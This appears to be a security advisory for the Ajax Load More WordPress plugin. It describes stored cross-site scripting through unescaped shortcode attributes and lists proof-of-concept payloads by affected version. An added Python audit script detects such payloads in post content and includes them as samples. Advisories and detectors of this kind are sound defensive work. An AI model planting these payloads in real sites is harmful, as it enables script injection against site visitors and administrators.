The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
Examples (a lot of attributes are affected, not just the ones below):

v < 5.6.0.3

```
[ajax_load_more id=‘" onmouseover=“alert(/XSS-id-1/)”’]
[ajax_load_more id=‘2" src onerror=alert(/XSSid-2/)//’]
[ajax_load_more id=‘a = 1;alert(/XSSid-3/); var b’]
[ajax_load_more button_label=‘"onmouseover=alert(/XSS-button_label/)//’]
[ajax_load_more button_loading_label=‘"onmouseover=alert(/XSS-button_loading_label/)//’]
[ajax_load_more button_done_label=‘"onmouseover=alert(/XSS-button_done_label/)//’]
```

v < 5.6.0.1

```
[ajax_load_more max_pages=‘"onmouseover=alert(/XSS-max_pages/)//’]
```

v < 5.6.0

```
[ajax_load_more repeater=‘" onmouseover=“alert(/XSS/)”’]
[ajax_load_more theme_repeater=‘" onmouseover=“alert(/XSS/)”’]
[ajax_load_more tag=‘" onmouseover=“alert(/XSS/)”’]
```

v < 5.5.5 (original from submitter)

```
[ajax_load_more css_classes=‘" onmouseover=“alert(/XSS/)”’]
```
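An added example, not part of the advisory or the plugin's code: a Python audit that scans stored post content for `ajax_load_more` shortcodes whose attribute values carry markup or script, which is what to review on a site that ran an affected version with contributor accounts. The function names, the allowlist patterns and the sample posts are assumptions of this example, and it expects straight quotes as stored in `post_content`.

```python
import re

SHORTCODE = re.compile(r"\[ajax_load_more\b([^\]]*)\]")
# name='value', name="value" or a bare name=value
ATTR = re.compile(r"""([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s'"\]]+))""")

# Assumed value shapes for this example; adjust to how the site uses the plugin.
ALLOWED = {
    "id": re.compile(r"[A-Za-z0-9_-]+"),  # strict: one id example above is script, not markup
    "max_pages": re.compile(r"\d+"),
}
# Any other attribute: characters or handlers that break out of an HTML attribute.
BREAKOUT = re.compile(r"""["<>]|\bon\w+\s*=""", re.IGNORECASE)


def suspicious_attrs(post_content):
    """Return (attribute, value) pairs that carry markup or script."""
    findings = []
    for shortcode in SHORTCODE.finditer(post_content):
        for m in ATTR.finditer(shortcode.group(1)):
            name = m.group(1).lower()
            value = next(g for g in m.groups()[1:] if g is not None)
            allowed = ALLOWED.get(name)
            if allowed is not None:
                bad = allowed.fullmatch(value) is None
            else:
                bad = BREAKOUT.search(value) is not None
            if bad:
                findings.append((name, value))
    return findings


def audit(posts):
    """Map post id -> findings, for posts with at least one finding."""
    report = {}
    for post_id, content in posts.items():
        hits = suspicious_attrs(content)
        if hits:
            report[post_id] = hits
    return report


# Constructed sample rows (post id -> post_content); payloads are the advisory's.
SAMPLE_POSTS = {
    101: '[ajax_load_more id="blog_list" max_pages="3" button_label="Older posts"]',
    102: "[ajax_load_more button_label='\"onmouseover=alert(/XSS-button_label/)//']",
    103: "[ajax_load_more id='a = 1;alert(/XSSid-3/); var b']",
}

if __name__ == "__main__":
    for post_id, hits in audit(SAMPLE_POSTS).items():
        print(post_id, hits)
```

A finding is a prompt for manual review of that post and its author, not proof of compromise; upgrading to a fixed version remains the remediation.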
CPE

Name | Operator | Version |
---|---|---|
ajax-load-more | lt | 5.6.0.3 |